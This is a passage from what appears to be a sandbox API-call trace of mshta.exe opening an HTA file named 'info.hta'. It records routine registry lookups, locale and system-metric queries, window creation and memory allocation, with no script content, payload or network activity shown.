(hKey=0x94) returned 0x0 [0221.517] RegCloseKey (hKey=0x98) returned 0x0 [0221.517] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.517] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.518] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.518] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.518] RegCloseKey (hKey=0x0) returned 0x6 [0221.518] RegCloseKey (hKey=0x0) returned 0x6 [0221.518] RegCloseKey (hKey=0x98) returned 0x0 [0221.518] RegCloseKey (hKey=0x94) returned 0x0 [0221.518] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.518] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.520] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.520] RegCloseKey (hKey=0x0) returned 0x6 [0221.520] RegCloseKey (hKey=0x0) returned 0x6 [0221.520] RegCloseKey (hKey=0x94) returned 0x0 [0221.520] RegCloseKey (hKey=0x98) returned 0x0 [0221.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.520] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.520] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.520] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.520] RegCloseKey (hKey=0x0) returned 0x6 [0221.520] RegCloseKey (hKey=0x0) returned 0x6 [0221.520] RegCloseKey (hKey=0x98) returned 0x0 [0221.520] RegCloseKey (hKey=0x94) returned 0x0 [0221.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.521] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.521] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.521] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.521] RegCloseKey (hKey=0x0) returned 0x6 [0221.521] RegCloseKey (hKey=0x0) returned 0x6 [0221.521] RegCloseKey (hKey=0x94) returned 0x0 [0221.521] RegCloseKey (hKey=0x98) returned 0x0 [0221.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.534] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.534] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.534] RegCloseKey (hKey=0x0) returned 0x6 [0221.534] RegCloseKey (hKey=0x0) returned 0x6 [0221.534] RegCloseKey (hKey=0x98) returned 0x0 [0221.534] RegCloseKey (hKey=0x94) returned 0x0 [0221.534] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x94) returned 0x0 [0221.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.534] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.534] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.534] RegCloseKey (hKey=0x0) returned 0x6 [0221.534] RegCloseKey (hKey=0x0) returned 0x6 [0221.534] RegCloseKey (hKey=0x94) returned 0x0 [0221.534] RegCloseKey (hKey=0x98) returned 0x0 [0221.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.535] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x94) returned 0x0 [0221.535] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.535] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.535] RegCloseKey (hKey=0x0) returned 0x6 [0221.535] RegCloseKey (hKey=0x0) returned 0x6 [0221.535] RegCloseKey (hKey=0x98) returned 0x0 [0221.535] RegCloseKey (hKey=0x94) returned 0x0 [0221.535] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0221.539] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.540] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x9c) returned 0x0 [0221.540] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.540] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.541] RegCloseKey (hKey=0x0) returned 0x6 [0221.541] RegCloseKey (hKey=0x0) returned 0x6 [0221.541] RegCloseKey (hKey=0x98) returned 0x0 [0221.541] RegCloseKey (hKey=0x9c) returned 0x0 [0221.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x9c) returned 0x0 [0221.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x98) returned 0x0 [0221.541] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.541] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.541] RegCloseKey (hKey=0x0) returned 0x6 [0221.541] RegCloseKey (hKey=0x0) returned 0x6 [0221.541] RegCloseKey (hKey=0x9c) returned 0x0 [0221.541] RegCloseKey (hKey=0x98) returned 0x0 [0221.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f368 | out: phkResult=0x41f368*=0x98) returned 0x0 [0221.541] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f36c | out: phkResult=0x41f36c*=0x9c) returned 0x0 [0221.542] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.542] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x41f328 | out: phkResult=0x41f328*=0x0) returned 0x2 [0221.542] RegCloseKey (hKey=0x0) returned 0x6 [0221.542] RegCloseKey (hKey=0x0) returned 0x6 [0221.542] RegCloseKey (hKey=0x98) returned 0x0 [0221.542] RegCloseKey (hKey=0x9c) returned 0x0 [0221.542] GetSystemMetrics (nIndex=68) returned 4 [0221.542] GetSystemMetrics (nIndex=69) returned 4 [0221.542] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0221.542] GetSystemDefaultLCID () returned 0x409 [0221.543] GetVersionExW (in: lpVersionInformation=0x41f2cc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x76f3e36c, dwMinorVersion=0x76f3e0d2, dwBuildNumber=0x7447afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x41f2cc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.543] GetUserDefaultUILanguage () returned 0x409 [0221.543] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x41f21c, cchData=16 | out: lpLCData="\x03") returned 16 [0221.545] GetKeyboardLayoutList (in: nBuff=32, lpList=0x41f24c | out: lpList=0x41f24c) returned 1 [0221.545] GetSystemMetrics (nIndex=4096) returned 0 [0221.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f370 | out: phkResult=0x41f370*=0x9c) returned 0x0 [0221.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41f374 | out: phkResult=0x41f374*=0x98) returned 0x0 [0221.546] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f330 | out: phkResult=0x41f330*=0x0) returned 0x2 [0221.546] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x41f330 | out: phkResult=0x41f330*=0x0) returned 0x2 [0221.546] RegCloseKey (hKey=0x0) returned 0x6 [0221.546] RegCloseKey (hKey=0x0) returned 0x6 [0221.546] RegCloseKey (hKey=0x9c) returned 0x0 [0221.546] RegCloseKey (hKey=0x98) returned 0x0 [0221.546] GetModuleFileNameW (in: hModule=0x73f40000, lpFilename=0x41f1d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0221.546] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3e) returned 0x483d10 [0221.546] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0221.546] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0221.546] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0221.546] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0221.546] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0221.546] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc14b [0221.546] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc14c [0221.546] GetDC (hWnd=0x0) returned 0x100101fa [0221.546] SHCreateShellPalette (hdc=0x0) returned 0x310801cb [0221.546] GetPaletteEntries (in: hpal=0x310801cb, iStart=0x0, cEntries=0x100, pPalEntries=0x7447a494 | out: pPalEntries=0x7447a494) returned 0x100 [0221.546] SHGetInverseCMAP (in: pbMap=0x74478a7c, cbMap=0x4 | out: pbMap=0x74478a7c) returned 0x0 [0221.546] GetDeviceCaps (hdc=0x100101fa, index=38) returned 32409 [0221.546] ReleaseDC (hWnd=0x0, hDC=0x100101fa) returned 1 [0221.546] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20a) returned 0x48e9a8 [0221.547] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2000) returned 0x48f3c0 [0221.547] GetCurrentProcessId () returned 0x380 [0221.547] _vsnprintf (in: _DstBuf=0x41f71c, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x41f3e4 | out: _DstBuf="#MSHTML#PERF#00000380") returned 21 [0221.547] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000380") returned 0x0 [0221.547] GetVersionExW (in: lpVersionInformation=0x41f400*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x473600, dwMinorVersion=0x100, dwBuildNumber=0x48dba8, dwPlatformId=0x470000, szCSDVersion="A") | out: lpVersionInformation=0x41f400*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0221.547] GetModuleHandleW (lpModuleName="advapi32") returned 0x763d0000 [0221.547] GetProcAddress (hModule=0x763d0000, lpProcName="EventWrite") returned 0x76f70c59 [0221.547] GetProcAddress (hModule=0x763d0000, lpProcName="EventRegister") returned 0x76f4f6ba [0221.547] GetProcAddress (hModule=0x763d0000, lpProcName="EventUnregister") returned 0x76f69241 [0221.547] EtwEventRegister () returned 0x0 [0221.547] EtwRegisterTraceGuidsW () returned 0x0 [0221.548] EtwRegisterTraceGuidsW () returned 0x0 [0221.548] EtwEventRegister () returned 0x0 [0221.548] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x41f1cc | out: lpdwHandle=0x41f1cc) returned 0x0 [0221.548] GetModuleHandleW (lpModuleName=0x0) returned 0xb40000 [0221.548] GetModuleFileNameW (in: hModule=0xb40000, lpFilename=0x41f1d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0221.548] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0221.550] GetCurrentProcessId () returned 0x380 [0221.550] GetCurrentProcessId () returned 0x380 [0221.551] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0221.551] GetLastError () returned 0xb7 [0221.551] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0221.551] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xa0000 [0221.573] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1d60 | out: hHeap=0x2e0000) returned 1 [0221.573] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1e70 | out: hHeap=0x2e0000) returned 1 [0221.573] RegCloseKey (hKey=0x42) returned 0x0 [0221.573] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0221.573] GetProcAddress (hModule=0x76180000, lpProcName="RegisterApplicationRestart") returned 0x761bb53c [0221.573] lstrlenA (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" ") returned 49 [0221.573] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x64) returned 0x2e1d60 [0221.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x472ac8, cbMultiByte=-1, lpWideCharStr=0x2e1d60, cchWideChar=50 | out: lpWideCharStr="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" ") returned 50 [0221.574] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" ", dwFlags=0x0) returned 0x0 [0221.574] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1d60 | out: hHeap=0x2e0000) returned 1 [0221.574] GetProcAddress (hModule=0x73f40000, lpProcName="RunHTMLApplication") returned 0x73f9e710 [0221.971] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" " [0222.104] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x495288 [0222.104] OleInitialize (pvReserved=0x0) returned 0x0 [0222.277] IsWindow (hWnd=0x0) returned 0 [0222.277] RegisterClassW (lpWndClass=0x41fa84) returned 0xc14d [0222.277] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x2016e [0222.277] NtdllDefWindowProc_W () returned 0x0 [0222.278] NtdllDefWindowProc_W () returned 0x1 [0222.278] NtdllDefWindowProc_W () returned 0x0 [0222.280] NtdllDefWindowProc_W () returned 0x0 [0222.280] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x2016e, hMenu=0x0, hInstance=0xb40000, lpParam=0x74479680) returned 0x20156 [0222.280] NtdllDefWindowProc_W () returned 0x0 [0222.280] NtdllDefWindowProc_W () returned 0x1 [0222.280] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] SetWindowLongW (hWnd=0x20156, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.281] NtdllDefWindowProc_W () returned 0x0 [0222.283] SetWindowPos (hWnd=0x20156, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0222.283] NtdllDefWindowProc_W () returned 0x0 [0222.283] NtdllDefWindowProc_W () returned 0x0 [0222.283] NtdllDefWindowProc_W () returned 0x0 [0222.283] NtdllDefWindowProc_W () returned 0x0 [0222.284] NtdllDefWindowProc_W () returned 0x0 [0222.284] SendMessageW (hWnd=0x20156, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0222.284] NtdllDefWindowProc_W () returned 0x0 [0222.284] NtdllDefWindowProc_W () returned 0x0 [0222.316] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x49a2e0 [0222.316] PathRemoveArgsW (in: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\" " | out: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\"") [0222.316] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\"" | out: pszPath="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\"") [0222.316] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta\"" | out: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta") returned 1 [0222.449] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta", ppmk=0x41fae4*=0x0, dwFlags=0x1 | out: ppmk=0x41fae4*=0x4805d8) returned 0x0 [0222.455] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49a2e0 | out: hHeap=0x470000) returned 1 [0222.455] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x484a40 [0222.455] CoCreateInstance (in: rclsid=0x74079770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740fb75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x744796d4 | out: ppv=0x744796d4*=0x4a1938) returned 0x0 [0222.463] DllGetClassObject (in: rclsid=0x49f804*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x74caee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ed94 | out: ppv=0x41ed94*=0x74478cb0) returned 0x0 [0222.658] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2a8) returned 0x4a0600 [0222.835] GetCurrentThreadId () returned 0x390 [0222.901] RegisterClassExW (param_1=0x41ec2c) returned 0xc14e [0222.901] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc14e, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x73f40000, lpParam=0x0) returned 0x20166 [0222.901] GetWindowLongW (hWnd=0x20166, nIndex=-20) returned 0 [0222.901] NtdllDefWindowProc_W () returned 0x1 [0222.901] NtdllDefWindowProc_W () returned 0x0 [0222.902] NtdllDefWindowProc_W () returned 0x0 [0222.902] NtdllDefWindowProc_W () returned 0x0 [0222.902] NtdllDefWindowProc_W () returned 0x0 [0222.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49ddc8 [0222.902] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49dde0 [0222.902] CreateCompatibleDC (hdc=0x0) returned 0xc0106ce [0222.902] GetDeviceCaps (hdc=0xc0106ce, index=90) returned 96 [0222.902] GetDeviceCaps (hdc=0xc0106ce, index=88) returned 96 [0222.902] GetSystemMetrics (nIndex=68) returned 4 [0222.902] GetSystemMetrics (nIndex=69) returned 4 [0222.902] GetSystemMetrics (nIndex=2) returned 17 [0222.902] GetSystemMetrics (nIndex=3) returned 17 [0222.902] GetStockObject (i=13) returned 0x18a002e [0222.902] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x18a002e [0222.902] GetTextMetricsW (in: hdc=0xc0106ce, lptm=0x41ecc4 | out: lptm=0x41ecc4) returned 1 [0222.902] SelectObject (hdc=0xc0106ce, h=0x18a002e) returned 0x18a002e [0222.902] DeleteObject (ho=0x18a002e) returned 1 [0222.902] GetSystemDefaultLCID () returned 0x409 [0222.902] GetUserDefaultLCID () returned 0x409 [0222.902] GetACP () returned 0x4e4 [0222.902] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x41ec38, cchData=41 | out: lpLCData="1") returned 2 [0222.902] _wtoi (_String="1") returned 1 [0222.902] RegCloseKey (hKey=0x0) returned 0x6 [0222.902] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x41ec8c, cchData=16 | out: lpLCData="0123456789") returned 11 [0222.902] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7447b038, fWinIni=0x0 | out: pvParam=0x7447b038) returned 1 [0222.903] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x41ed00, fWinIni=0x0 | out: pvParam=0x41ed00) returned 1 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc0) returned 0x4a09b8 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49ddf8 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa4) returned 0x4a0a80 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x493348 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x49aa28 [0222.903] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489100 [0222.903] GetSystemWindowsDirectoryW (in: lpBuffer=0x41eb0c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0222.903] lstrlenW (lpString="C:\\Windows") returned 10 [0222.903] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0222.903] CreateActCtxW (pActCtx=0x41eae8) returned 0x4a0b34 [0222.904] ActivateActCtx (in: hActCtx=0x4a0b34, lpCookie=0x41eab8 | out: hActCtx=0x4a0b34, lpCookie=0x41eab8) returned 1 [0222.904] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74720000 [0222.907] DeactivateActCtx (dwFlags=0x0, ulCookie=0x152f0001) returned 1 [0222.907] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0222.908] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0222.908] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0222.908] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", 